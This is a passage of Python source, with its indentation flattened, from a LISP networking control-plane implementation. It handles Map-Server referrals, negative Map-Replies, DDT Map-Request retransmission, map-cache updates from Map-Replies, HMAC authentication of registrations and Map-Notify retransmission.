eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from ddt-cache for EID {} " + \
"using auth-prefix {} is {}").format(green(eid.print_address(), False),
auth_prefix_str, neg_prefix.print_prefix()))
return(neg_prefix)
#enddef
#
# lisp_ms_compute_neg_prefix
#
# From the site cache and the DDT cache, compute a negative EID-prefix to not
# be shorter than a configured authoritative-prefix.
#
def lisp_ms_compute_neg_prefix(eid, group):
neg_prefix = lisp_address(eid.afi, "", 0, 0)
neg_prefix.copy_address(eid)
neg_prefix.mask_len = 0
gneg_prefix = lisp_address(group.afi, "", 0, 0)
gneg_prefix.copy_address(group)
gneg_prefix.mask_len = 0
auth_prefix = None
#
# Look for auth-prefix in DDT cache. If not found, we return the host
# based EID in a negative Map-Referral, action non-authoritative.
#
if (group.is_null()):
ddt_entry = lisp_ddt_cache.lookup_cache(eid, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
cache = lisp_sites_by_eid
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.eid
else:
ddt_entry = lisp_ddt_cache.lookup_cache(group, False)
if (ddt_entry == None):
neg_prefix.mask_len = neg_prefix.host_mask_len()
gneg_prefix.mask_len = gneg_prefix.host_mask_len()
return([neg_prefix, gneg_prefix, LISP_DDT_ACTION_NOT_AUTH])
#endif
if (ddt_entry.is_auth_prefix()): auth_prefix = ddt_entry.group
group, auth_prefix, gneg_prefix = lisp_sites_by_eid.walk_cache( \
lisp_neg_prefix_walk, (group, auth_prefix, gneg_prefix))
gneg_prefix.mask_address(gneg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for " + \
"group EID {} using auth-prefix {} is {}").format( \
group.print_address(), auth_prefix.print_prefix() if \
(auth_prefix != None) else "'not found'",
gneg_prefix.print_prefix()))
cache = ddt_entry.source_cache
#endif
#
# Return the auth-prefix if we found it in the DDT cache.
#
action = LISP_DDT_ACTION_DELEGATION_HOLE if (auth_prefix != None) else \
LISP_DDT_ACTION_NOT_AUTH
#
# Walk looking for the shortest prefix that DOES not match any site EIDs
# configured.
#
eid, auth_prefix, neg_prefix = cache.walk_cache(lisp_neg_prefix_walk,
(eid, auth_prefix, neg_prefix))
#
# Store high-order bits that are covered by the mask-length.
#
neg_prefix.mask_address(neg_prefix.mask_len)
lprint(("Least specific prefix computed from site-cache for EID {} " + \
"using auth-prefix {} is {}").format( \
green(eid.print_address(), False),
auth_prefix.print_prefix() if (auth_prefix != None) else \
"'not found'", neg_prefix.print_prefix()))
return([neg_prefix, gneg_prefix, action])
#enddef
#
# lisp_ms_send_map_referral
#
# This function is for a Map-Server to send a Map-Referral to a requesting
# node.
#
def lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source, port,
action, eid_prefix, group_prefix):
eid = map_request.target_eid
group = map_request.target_group
nonce = map_request.nonce
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
#
# Build Map-Server specific Map-Referral.
#
map_referral = lisp_map_referral()
map_referral.record_count = 1
map_referral.nonce = nonce
packet = map_referral.encode()
map_referral.print_map_referral()
incomplete = False
#
# Figure out what action code, EID-prefix, and ttl to return in the EID-
    # record. Temporarily return the requested prefix until we have
    # lisp_ms_compute_neg_prefix() working.
#
if (action == LISP_DDT_ACTION_SITE_NOT_FOUND):
eid_prefix, group_prefix, action = lisp_ms_compute_neg_prefix(eid,
group)
ttl = 15
#endif
if (action == LISP_DDT_ACTION_MS_NOT_REG): ttl = 1
if (action == LISP_DDT_ACTION_MS_ACK): ttl = 1440
if (action == LISP_DDT_ACTION_DELEGATION_HOLE): ttl = 15
if (action == LISP_DDT_ACTION_NOT_AUTH): ttl = 0
is_ms_peer = False
rloc_count = 0
ddt_entry = lisp_ddt_cache_lookup(eid, group, False)
if (ddt_entry != None):
rloc_count = len(ddt_entry.delegation_set)
is_ms_peer = ddt_entry.is_ms_peer_entry()
ddt_entry.map_referrals_sent += 1
#endif
#
# Conditions when the incomplete bit should be set in the Map-Referral.
#
if (action == LISP_DDT_ACTION_NOT_AUTH): incomplete = True
if (action in (LISP_DDT_ACTION_MS_REFERRAL, LISP_DDT_ACTION_MS_ACK)):
incomplete = (is_ms_peer == False)
#endif
#
# Store info in EID-record.
#
eid_record = lisp_eid_record()
eid_record.rloc_count = rloc_count
eid_record.authoritative = True
eid_record.action = action
eid_record.ddt_incomplete = incomplete
eid_record.eid = eid_prefix
eid_record.group= group_prefix
eid_record.record_ttl = ttl
packet += eid_record.encode()
eid_record.print_record(" ", True)
#
# Build referral-set.
#
if (rloc_count != 0):
for ddt_node in ddt_entry.delegation_set:
rloc_record = lisp_rloc_record()
rloc_record.rloc = ddt_node.delegate_address
rloc_record.priority = ddt_node.priority
rloc_record.weight = ddt_node.weight
rloc_record.mpriority = 255
rloc_record.mweight = 0
rloc_record.reach_bit = True
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#endif
#
# Build packet and send Map-Referral message to the source of the
# Map-Request.
#
if (map_request.nonce != 0): port = LISP_CTRL_PORT
lisp_send_map_referral(lisp_sockets, packet, ecm_source, port)
return
#enddef
#
# lisp_send_negative_map_reply
#
# Send a negative Map-Reply. This is one with a specific action code and zero
# RLOCs in the locator-set.
#
def lisp_send_negative_map_reply(sockets, eid, group, nonce, dest, port, ttl,
xtr_id, pubsub):
lprint("Build negative Map-Reply EID-prefix {}, nonce 0x{} to ITR {}". \
format(lisp_print_eid_tuple(eid, group), lisp_hex_string(nonce),
red(dest.print_address(), False)))
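    #
    # Unicast lookups (no group) get a native-forward action; (S,G) lookups
    # get a drop action.
    #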
action = LISP_NATIVE_FORWARD_ACTION if group.is_null() else \
LISP_DROP_ACTION
#
# If this is a crypto-EID, return LISP_SEND_MAP_REQUEST_ACTION.
#
if (lisp_get_eid_hash(eid) != None):
action = LISP_SEND_MAP_REQUEST_ACTION
#endif
packet = lisp_build_map_reply(eid, group, [], nonce, action, ttl, False,
None, False, False)
#
# Send Map-Notify if this Map-Request is a subscribe-request.
#
if (pubsub):
lisp_process_pubsub(sockets, packet, eid, dest, port, nonce, ttl,
xtr_id)
else:
lisp_send_map_reply(sockets, packet, dest, port)
#endif
return
#enddef
#
# lisp_retransmit_ddt_map_request
#
# Have the Map-Resolver transmit a DDT Map-Request.
#
def lisp_retransmit_ddt_map_request(mr):
seid_str = mr.mr_source.print_address()
deid_str = mr.print_eid_tuple()
nonce = mr.nonce
#
    # Get the referral-node we sent the Map-Request to last time. We need
    # to increment its no-response counter.
#
if (mr.last_request_sent_to):
last_node = mr.last_request_sent_to.print_address()
ref = lisp_referral_cache_lookup(mr.last_cached_prefix[0],
mr.last_cached_prefix[1], True)
if (ref and ref.referral_set.has_key(last_node)):
ref.referral_set[last_node].no_responses += 1
#endif
#endif
#
    # Did we reach the max number of retries? We are giving up since no
    # responses have been received.
#
if (mr.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("DDT Map-Request retry limit reached for EID {}, nonce 0x{}". \
format(green(deid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
mr.retry_count += 1
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Retransmit DDT {} from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format(bold("Map-Request", False), "P" if mr.from_pitr else "",
red(mr.itr.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Do referral lookup and send the DDT Map-Request again.
#
lisp_send_ddt_map_request(mr, False)
#
# Restart retransmit timer.
#
mr.retransmit_timer = threading.Timer(LISP_DDT_MAP_REQUEST_INTERVAL,
lisp_retransmit_ddt_map_request, [mr])
mr.retransmit_timer.start()
return
#enddef
#
# lisp_get_referral_node
#
# Get a referral-node of highest priority that is in the up state. Returns
# class lisp_referral_node().
#
def lisp_get_referral_node(referral, source_eid, dest_eid):
#
# Build list of high-priority up referral-nodes.
#
ref_set = []
for ref_node in referral.referral_set.values():
if (ref_node.updown == False): continue
if (len(ref_set) == 0 or ref_set[0].priority == ref_node.priority):
ref_set.append(ref_node)
elif (ref_set[0].priority > ref_node.priority):
ref_set = []
ref_set.append(ref_node)
#endif
#endfor
ref_count = len(ref_set)
if (ref_count == 0): return(None)
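    #
    # Hash the source and destination EIDs to pick one of the equal-priority
    # referral-nodes deterministically.
    #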
hashval = dest_eid.hash_address(source_eid)
hashval = hashval % ref_count
return(ref_set[hashval])
#enddef
#
# lisp_send_ddt_map_request
#
# Send a DDT Map-Request based on a EID lookup in the referral cache.
#
def lisp_send_ddt_map_request(mr, send_to_root):
lisp_sockets = mr.lisp_sockets
nonce = mr.nonce
itr = mr.itr
mr_source = mr.mr_source
eid_str = mr.print_eid_tuple()
#
# Check if the maximum allowable Map-Requests have been sent for this
# map-request-queue entry.
#
if (mr.send_count == 8):
lprint("Giving up on map-request-queue entry {}, nonce 0x{}".format( \
green(eid_str, False), lisp_hex_string(nonce)))
mr.dequeue_map_request()
return
#endif
#
    # The caller may want us to use the root versus a best-match lookup. We
    # only do this once per Map-Request queue entry.
#
if (send_to_root):
lookup_eid = lisp_address(LISP_AFI_NONE, "", 0, 0)
lookup_group = lisp_address(LISP_AFI_NONE, "", 0, 0)
mr.tried_root = True
lprint("Jumping up to root for EID {}".format(green(eid_str, False)))
else:
lookup_eid = mr.eid
lookup_group = mr.group
#endif
#
# Do longest match on EID into DDT referral cache.
#
referral = lisp_referral_cache_lookup(lookup_eid, lookup_group, False)
if (referral == None):
lprint("No referral cache entry found")
lisp_send_negative_map_reply(lisp_sockets, lookup_eid, lookup_group,
nonce, itr, mr.sport, 15, None, False)
return
#endif
ref_str = referral.print_eid_tuple()
lprint("Found referral cache entry {}, referral-type: {}".format(ref_str,
referral.print_referral_type()))
ref_node = lisp_get_referral_node(referral, mr_source, mr.eid)
if (ref_node == None):
lprint("No reachable referral-nodes found")
mr.dequeue_map_request()
lisp_send_negative_map_reply(lisp_sockets, referral.eid,
referral.group, nonce, itr, mr.sport, 1, None, False)
return
#endif
lprint("Send DDT Map-Request to {} {} for EID {}, nonce 0x{}". \
format(ref_node.referral_address.print_address(),
referral.print_referral_type(), green(eid_str, False),
lisp_hex_string(nonce)))
#
# Encapsulate Map-Request and send out.
#
to_ms = (referral.referral_type == LISP_DDT_ACTION_MS_REFERRAL or
referral.referral_type == LISP_DDT_ACTION_MS_ACK)
lisp_send_ecm(lisp_sockets, mr.packet, mr_source, mr.sport, mr.eid,
ref_node.referral_address, to_ms=to_ms, ddt=True)
#
# Do some stats.
#
mr.last_request_sent_to = ref_node.referral_address
mr.last_sent = lisp_get_timestamp()
mr.send_count += 1
ref_node.map_requests_sent += 1
return
#enddef
#
# lisp_mr_process_map_request
#
# Process a Map-Request received from an ITR. We need to forward this Map-Request
# to the longest matched referral from the referral-cache.
#
def lisp_mr_process_map_request(lisp_sockets, packet, map_request, ecm_source,
sport, mr_source):
eid = map_request.target_eid
group = map_request.target_group
deid_str = map_request.print_eid_tuple()
seid_str = mr_source.print_address()
nonce = map_request.nonce
s = green(seid_str, False)
d = green(deid_str, False)
lprint("Received Map-Request from {}ITR {} EIDs: {} -> {}, nonce 0x{}". \
format("P" if map_request.pitr_bit else "",
red(ecm_source.print_address(), False), s, d,
lisp_hex_string(nonce)))
#
# Queue the Map-Request. We need to reliably transmit it.
#
mr = lisp_ddt_map_request(lisp_sockets, packet, eid, group, nonce)
mr.packet = packet
mr.itr = ecm_source
mr.mr_source = mr_source
mr.sport = sport
mr.from_pitr = map_request.pitr_bit
mr.queue_map_request()
lisp_send_ddt_map_request(mr, False)
return
#enddef
#
# lisp_process_map_request
#
# Process received Map-Request as a Map-Server or an ETR.
#
def lisp_process_map_request(lisp_sockets, packet, ecm_source, ecm_port,
mr_source, mr_port, ddt_request, ttl):
orig_packet = packet
map_request = lisp_map_request()
packet = map_request.decode(packet, mr_source, mr_port)
if (packet == None):
lprint("Could not decode Map-Request packet")
return
#endif
map_request.print_map_request()
#
# If RLOC-probe request, process separately.
#
if (map_request.rloc_probe):
lisp_process_rloc_probe_request(lisp_sockets, map_request,
mr_source, mr_port, ttl)
return
#endif
#
# Process SMR.
#
if (map_request.smr_bit):
lisp_process_smr(map_request)
#endif
#
# Process SMR-invoked Map-Request.
#
if (map_request.smr_invoked_bit):
lisp_process_smr_invoked_request(map_request)
#endif
#
# Do ETR processing of the Map-Request if we found a database-mapping.
#
if (lisp_i_am_etr):
lisp_etr_process_map_request(lisp_sockets, map_request, mr_source,
mr_port, ttl)
#endif
#
# Do Map-Server processing of the Map-Request.
#
if (lisp_i_am_ms):
packet = orig_packet
eid, group, ddt_action = lisp_ms_process_map_request(lisp_sockets,
orig_packet, map_request, mr_source, mr_port, ecm_source)
if (ddt_request):
lisp_ms_send_map_referral(lisp_sockets, map_request, ecm_source,
ecm_port, ddt_action, eid, group)
#endif
return
#endif
#
# Map-Request is from an ITR destined to a Map-Resolver.
#
if (lisp_i_am_mr and not ddt_request):
lisp_mr_process_map_request(lisp_sockets, orig_packet, map_request,
ecm_source, mr_port, mr_source)
#endif
#
# Do DDT-node processing of the Map-Request.
#
if (lisp_i_am_ddt or ddt_request):
packet = orig_packet
lisp_ddt_process_map_request(lisp_sockets, map_request, ecm_source,
ecm_port)
#endif
return
#enddef
#
# lisp_store_mr_stats
#
# Store counter and timing stats for the map-resolver that just sent us a
# negative Map-Reply.
#
def lisp_store_mr_stats(source, nonce):
mr = lisp_get_map_resolver(source, None)
if (mr == None): return
#
# Count and record timestamp.
#
mr.neg_map_replies_received += 1
mr.last_reply = lisp_get_timestamp()
#
# For every 100 replies, reset the total_rtt so we can get a new average.
#
if ((mr.neg_map_replies_received % 100) == 0): mr.total_rtt = 0
#
# If Map-Reply matches stored nonce, then we can do an RTT calculation.
#
if (mr.last_nonce == nonce):
mr.total_rtt += (time.time() - mr.last_used)
mr.last_nonce = 0
#endif
if ((mr.neg_map_replies_received % 10) == 0): mr.last_nonce = 0
return
#enddef
#
# lisp_process_map_reply
#
# Process received Map-Reply.
#
def lisp_process_map_reply(lisp_sockets, packet, source, ttl):
global lisp_map_cache
map_reply = lisp_map_reply()
packet = map_reply.decode(packet)
if (packet == None):
lprint("Could not decode Map-Reply packet")
return
#endif
map_reply.print_map_reply()
#
# Process each EID record in Map-Reply message.
#
rloc_key_change = None
for i in range(map_reply.record_count):
eid_record = lisp_eid_record()
packet = eid_record.decode(packet)
if (packet == None):
lprint("Could not decode EID-record in Map-Reply packet")
return
#endif
eid_record.print_record(" ", False)
#
# If negative Map-Reply, see if from a Map-Resolver, do some counting
# and timing stats.
#
if (eid_record.rloc_count == 0):
lisp_store_mr_stats(source, map_reply.nonce)
#endif
multicast = (eid_record.group.is_null() == False)
#
# If this is a (0.0.0.0/0, G) with drop-action, we don't want to
# cache more-specific (S,G) entry. It is a startup timing problem.
#
if (lisp_decent_push_configured):
action = eid_record.action
if (multicast and action == LISP_DROP_ACTION):
if (eid_record.eid.is_local()): continue
#endif
#endif
#
# Some RLOC-probe Map-Replies may have no EID value in the EID-record.
# Like from RTRs or PETRs.
#
if (eid_record.eid.is_null()): continue
#
# Do not lose state for other RLOCs that may be stored in an already
# cached map-cache entry.
#
if (multicast):
mc = lisp_map_cache_lookup(eid_record.eid, eid_record.group)
else:
mc = lisp_map_cache.lookup_cache(eid_record.eid, True)
#endif
new_mc = (mc == None)
#
# Process each RLOC record in EID record.
#
rloc_set = []
for j in range(eid_record.rloc_count):
rloc_record = lisp_rloc_record()
rloc_record.keys = map_reply.keys
packet = rloc_record.decode(packet, map_reply.nonce)
if (packet == None):
lprint("Could not decode RLOC-record in Map-Reply packet")
return
#endif
rloc_record.print_record(" ")
old_rloc = None
if (mc): old_rloc = mc.get_rloc(rloc_record.rloc)
if (old_rloc):
rloc = old_rloc
else:
rloc = lisp_rloc()
#endif
#
# Copy RLOC data from record, add to locator-set. Check to see
# if the RLOC has been translated by a NAT. If so, go get the
# translated port and store in rloc entry.
#
port = rloc.store_rloc_from_record(rloc_record, map_reply.nonce,
source)
rloc.echo_nonce_capable = map_reply.echo_nonce_capable
if (rloc.echo_nonce_capable):
addr_str = rloc.rloc.print_address_no_iid()
if (lisp_get_echo_nonce(None, addr_str) == None):
lisp_echo_nonce(addr_str)
#endif
#endif
#
# Process state for RLOC-probe reply from this specific RLOC. And
# update RLOC state for map-cache entry. Ignore an RLOC with a
            # different address-family than the received packet. The ITR really
# doesn't know it can reach the RLOC unless it probes for that
# address-family.
#
if (map_reply.rloc_probe and rloc_record.probe_bit):
if (rloc.rloc.afi == source.afi):
lisp_process_rloc_probe_reply(rloc.rloc, source, port,
map_reply.nonce, map_reply.hop_count, ttl)
#endif
#endif
#
# Append to rloc-set array to be stored in map-cache entry.
#
rloc_set.append(rloc)
#
            # Did keys change for this RLOC? Flag it if so.
#
if (lisp_data_plane_security and rloc.rloc_recent_rekey()):
rloc_key_change = rloc
#endif
#endfor
#
# If the map-cache entry is for an xTR behind a NAT, we'll find an
# RTR RLOC (which is priority 254). Store private RLOCs that may
# come along with the RTR RLOC because the destination RLOC could
# be behind the same NAT as this ITR. This ITR, however could be
# behind another NAT or in public space. We want to mark the
# private address RLOC unreachable for the two later cases.
#
if (map_reply.rloc_probe == False and lisp_nat_traversal):
new_set = []
log_set = []
for rloc in rloc_set:
#
# Set initial state for private RLOCs to UNREACH and test
# with RLOC-probes if up behind same NAT.
#
if (rloc.rloc.is_private_address()):
rloc.priority = 1
rloc.state = LISP_RLOC_UNREACH_STATE
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
continue
#endif
#
                # An RTR should not put RTR RLOCs in its map-cache, but xTRs
                # do. Non-RTR RLOCs should only go in the RTR map-cache.
#
if (rloc.priority == 254 and lisp_i_am_rtr == False):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
if (rloc.priority != 254 and lisp_i_am_rtr):
new_set.append(rloc)
log_set.append(rloc.rloc.print_address_no_iid())
#endif
#endfor
if (log_set != []):
rloc_set = new_set
lprint("NAT-traversal optimized RLOC-set: {}".format(log_set))
#endif
#endif
#
# If any RLOC-records do not have RLOCs, don't put them in the map-
# cache.
#
new_set = []
for rloc in rloc_set:
if (rloc.json != None): continue
new_set.append(rloc)
#endfor
if (new_set != []):
count = len(rloc_set) - len(new_set)
lprint("Pruning {} no-address RLOC-records for map-cache".format( \
count))
rloc_set = new_set
#endif
#
# If this is an RLOC-probe reply and the RLOCs are registered with
# merge semantics, this Map-Reply may not include the other RLOCs.
# In this case, do not wipe out the other RLOCs. Get them from the
# existing entry.
#
if (map_reply.rloc_probe and mc != None): rloc_set = mc.rloc_set
#
# If we are overwriting the rloc-set cached in the map-cache entry,
# then remove the old rloc pointers from the RLOC-probe list.
#
rloc_set_change = new_mc
if (mc and rloc_set != mc.rloc_set):
mc.delete_rlocs_from_rloc_probe_list()
rloc_set_change = True
#endif
#
# Add to map-cache. If this is a replace, save uptime.
#
uptime = mc.uptime if (mc) else None
mc = lisp_mapping(eid_record.eid, eid_record.group, rloc_set)
mc.mapping_source = source
mc.map_cache_ttl = eid_record.store_ttl()
mc.action = eid_record.action
mc.add_cache(rloc_set_change)
add_or_replace = "Add"
if (uptime):
mc.uptime = uptime
add_or_replace = "Replace"
#endif
lprint("{} {} map-cache with {} RLOCs".format(add_or_replace,
green(mc.print_eid_tuple(), False), len(rloc_set)))
#
# If there were any changes to the RLOC-set or the keys for any
# existing RLOC in the RLOC-set, tell the external data-plane.
#
if (lisp_ipc_dp_socket and rloc_key_change != None):
lisp_write_ipc_keys(rloc_key_change)
#endif
#
# Send RLOC-probe to highest priority RLOCs if this is a new map-cache
# entry. But if any of the RLOCs were used before in other map-cache
# entries, no need to send RLOC-probes.
#
if (new_mc):
probe = bold("RLOC-probe", False)
for rloc in mc.best_rloc_set:
addr_str = red(rloc.rloc.print_address_no_iid(), False)
lprint("Trigger {} to {}".format(probe, addr_str))
lisp_send_map_request(lisp_sockets, 0, mc.eid, mc.group, rloc)
#endfor
#endif
#endfor
return
#enddef
#
# lisp_compute_auth
#
# Create HMAC hash from packet contents stored in lisp_map_register() and
# encode in packet buffer.
#
def lisp_compute_auth(packet, map_register, password):
if (map_register.alg_id == LISP_NONE_ALG_ID): return(packet)
packet = map_register.zero_auth(packet)
hashval = lisp_hash_me(packet, map_register.alg_id, password, False)
#
# Store packed hash value in lisp_map_register().
#
map_register.auth_data = hashval
packet = map_register.encode_auth(packet)
return(packet)
#enddef
#
# lisp_hash_me
#
# Call HMAC hashing code from multiple places. Returns hash value.
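# Returns a hex-digit string when do_hex is True and the raw digest bytes
# otherwise.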
#
def lisp_hash_me(packet, alg_id, password, do_hex):
if (alg_id == LISP_NONE_ALG_ID): return(True)
if (alg_id == LISP_SHA_1_96_ALG_ID):
hashalg = hashlib.sha1
#endif
if (alg_id == LISP_SHA_256_128_ALG_ID):
hashalg = hashlib.sha256
#endif
if (do_hex):
hashval = hmac.new(password, packet, hashalg).hexdigest()
else:
hashval = hmac.new(password, packet, hashalg).digest()
#endif
return(hashval)
#enddef
#
# lisp_verify_auth
#
# Compute sha1 or sha2 hash over Map-Register packet and compare with one
# transmitted in packet that is stored in class lisp_map_register.
#
def lisp_verify_auth(packet, alg_id, auth_data, password):
if (alg_id == LISP_NONE_ALG_ID): return(True)
hashval = lisp_hash_me(packet, alg_id, password, True)
matched = (hashval == auth_data)
#
    # Print the hash values if they do not match.
#
if (matched == False):
lprint("Hashed value: {} does not match packet value: {}".format( \
hashval, auth_data))
#endif
return(matched)
#enddef
#
# lisp_retransmit_map_notify
#
# Retransmit the already built Map-Notify message.
#
def lisp_retransmit_map_notify(map_notify):
dest = map_notify.etr
port = map_notify.etr_port
#
# Did we reach the max number of retries? We are giving up since no
# Map-Notify-Acks have been received.
#
if (map_notify.retry_count == LISP_MAX_MAP_NOTIFY_RETRIES):
lprint("Map-Notify with nonce 0x{} retry limit reached for ETR {}". \
format(map_notify.nonce_key, red(dest.print_address(), False)))
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
map_notify.retransmit_timer.cancel()
lprint("Dequeue Map-Notify from retransmit queue, key is: {}". \
format(key))
try:
lisp_map_notify_queue.pop(key)
except:
lprint("Key not found in Map-Notify queue")
#endtry
#endif
return
#endif
lisp_sockets = map_notify.lisp_sockets
map_notify.retry_count += 1
lprint("Retransmit {} with nonce 0x{} to xTR {}, retry {}".format( \
bold("Map-Notify", False), map_notify.nonce_key,
red(dest.print_address(), False), map_notify.retry_count))
lisp_send_map_notify(lisp_sockets, map_notify.packet, dest, port)
if (map_notify.site): map_notify.site.map_notifies_sent += 1
#
# Restart retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_merged_map_notify
#
# Send Map-Notify with a merged RLOC-set to each ETR in the RLOC-set.
#
def lisp_send_merged_map_notify(lisp_sockets, parent, map_register,
eid_record):
#
# Build EID-record once.
#
eid_record.rloc_count = len(parent.registered_rlocs)
packet_record = eid_record.encode()
eid_record.print_record("Merged Map-Notify ", False)
#
    # Build RLOC-records for merged RLOC-set.
#
for xtr in parent.registered_rlocs:
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(xtr)
packet_record += rloc_record.encode()
rloc_record.print_record(" ")
del(rloc_record)
#endfor
#
# Build Map-Notify for each xTR that needs to receive the Map-Notify.
#
for xtr in parent.registered_rlocs:
dest = xtr.rloc
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
key_id = map_register.key_id
map_notify.key_id = key_id
map_notify.alg_id = map_register.alg_id
map_notify.auth_len = map_register.auth_len
map_notify.nonce = map_register.nonce
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(dest)
map_notify.etr_port = map_register.sport
map_notify.site = parent.site
packet = map_notify.encode(packet_record, parent.site.auth_key[key_id])
map_notify.print_notify()
#
# Put Map-Notify state on retransmission queue.
#
key = map_notify.nonce_key
if (lisp_map_notify_queue.has_key(key)):
remove = lisp_map_notify_queue[key]
remove.retransmit_timer.cancel()
del(remove)
#endif
lisp_map_notify_queue[key] = map_notify
#
# Send out.
#
lprint("Send merged Map-Notify to ETR {}".format( \
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
parent.site.map_notifies_sent += 1
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
#endfor
return
#enddef
#
# lisp_build_map_notify
#
# Setup retransmission queue entry to send the first Map-Notify.
#
def lisp_build_map_notify(lisp_sockets, eid_records, eid_list, record_count,
source, port, nonce, key_id, alg_id, auth_len, site, map_register_ack):
key = lisp_hex_string(nonce) + source.print_address()
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
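    # The 2-tuple key built above is the hex nonce concatenated with the
    # xTR's address string.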
#
lisp_remove_eid_from_map_notify_queue(eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
s = red(source.print_address_no_iid(), False)
lprint("Map-Notify with nonce 0x{} pending for xTR {}".format( \
lisp_hex_string(map_notify.nonce), s))
return
#endif
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = record_count
map_notify.key_id = key_id
map_notify.alg_id = alg_id
map_notify.auth_len = auth_len
map_notify.nonce = nonce
map_notify.nonce_key = lisp_hex_string(nonce)
map_notify.etr.copy_address(source)
map_notify.etr_port = port
map_notify.site = site
map_notify.eid_list = eid_list
#
# Put Map-Notify state on retransmission queue.
#
if (map_register_ack == False):
key = map_notify.nonce_key
lisp_map_notify_queue[key] = map_notify
#endif
if (map_register_ack):
lprint("Send Map-Notify to ack Map-Register")
else:
lprint("Send Map-Notify for RLOC-set change")
#endif
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, site.auth_key[key_id])
map_notify.print_notify()
if (map_register_ack == False):
eid_record = lisp_eid_record()
eid_record.decode(eid_records)
eid_record.print_record(" ", False)
#endif
#
# Send out.
#
lisp_send_map_notify(lisp_sockets, packet, map_notify.etr, port)
site.map_notifies_sent += 1
if (map_register_ack): return
#
    # Set retransmit timer if this is an unsolicited Map-Notify. Otherwise,
# we are acknowledging a Map-Register and the registerer is not going
# to send a Map-Notify-Ack so we shouldn't expect one.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
lisp_retransmit_map_notify, [map_notify])
map_notify.retransmit_timer.start()
return
#enddef
#
# lisp_send_map_notify_ack
#
# Change Map-Notify message to have a new type (Map-Notify-Ack) and
# reauthenticate message.
#
def lisp_send_map_notify_ack(lisp_sockets, eid_records, map_notify, ms):
map_notify.map_notify_ack = True
#
# Build packet and copy EID records from Map-Register.
#
packet = map_notify.encode(eid_records, ms.password)
map_notify.print_notify()
#
# Send the Map-Notify-Ack.
#
dest = ms.map_server
lprint("Send Map-Notify-Ack to {}".format(
red(dest.print_address(), False)))
lisp_send(lisp_sockets, dest, LISP_CTRL_PORT, packet)
return
#enddef
#
# lisp_send_multicast_map_notify
#
# Send a Map-Notify message to an xTR for the supplied (S,G) passed into this
# function.
#
def lisp_send_multicast_map_notify(lisp_sockets, site_eid, eid_list, xtr):
map_notify = lisp_map_notify(lisp_sockets)
map_notify.record_count = 1
map_notify.nonce = lisp_get_control_nonce()
map_notify.nonce_key = lisp_hex_string(map_notify.nonce)
map_notify.etr.copy_address(xtr)
map_notify.etr_port = LISP_CTRL_PORT
map_notify.eid_list = eid_list
key = map_notify.nonce_key
#
# If we are already sending Map-Notifies for the 2-tuple, no need to
# queue an entry and send one out. Let the retransmission timer trigger
# the sending.
#
lisp_remove_eid_from_map_notify_queue(map_notify.eid_list)
if (lisp_map_notify_queue.has_key(key)):
map_notify = lisp_map_notify_queue[key]
lprint("Map-Notify with nonce 0x{} pending for ITR {}".format( \
map_notify.nonce, red(xtr.print_address_no_iid(), False)))
return
#endif
#
# Put Map-Notify state on retransmission queue.
#
lisp_map_notify_queue[key] = map_notify
#
# Determine if there are any RTRs in the RLOC-set for this (S,G).
#
rtrs_exist = site_eid.rtrs_in_rloc_set()
if (rtrs_exist):
if (site_eid.is_rtr_in_rloc_set(xtr)): rtrs_exist = False
#endif
#
# Build EID-record.
#
eid_record = lisp_eid_record()
eid_record.record_ttl = 1440
eid_record.eid.copy_address(site_eid.eid)
eid_record.group.copy_address(site_eid.group)
eid_record.rloc_count = 0
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
eid_record.rloc_count += 1
#endfor
packet = eid_record.encode()
#
# Print contents of Map-Notify.
#
map_notify.print_notify()
eid_record.print_record(" ", False)
#
# Build locator-set with only RTR RLOCs if they exist.
#
for rloc_entry in site_eid.registered_rlocs:
if (rtrs_exist ^ rloc_entry.is_rtr()): continue
rloc_record = lisp_rloc_record()
rloc_record.store_rloc_entry(rloc_entry)
packet += rloc_record.encode()
rloc_record.print_record(" ")
#endfor
#
# Encode it.
#
packet = map_notify.encode(packet, "")
if (packet == None): return
#
# Send Map-Notify to xtR.
#
lisp_send_map_notify(lisp_sockets, packet, xtr, LISP_CTRL_PORT)
#
# Set retransmit timer.
#
map_notify.retransmit_timer = threading.Timer(LISP_MAP_NOTIFY_INTERVAL,
